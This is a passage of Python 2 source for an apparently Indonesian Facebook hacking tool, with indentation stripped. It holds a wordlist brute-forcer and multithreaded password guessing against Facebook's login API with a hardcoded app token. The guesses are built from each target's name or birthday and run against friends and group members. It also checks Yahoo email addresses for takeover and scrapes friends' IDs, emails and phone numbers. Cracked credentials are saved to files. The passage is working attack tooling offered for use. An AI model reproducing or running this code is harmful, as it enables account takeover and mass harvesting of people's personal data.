data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
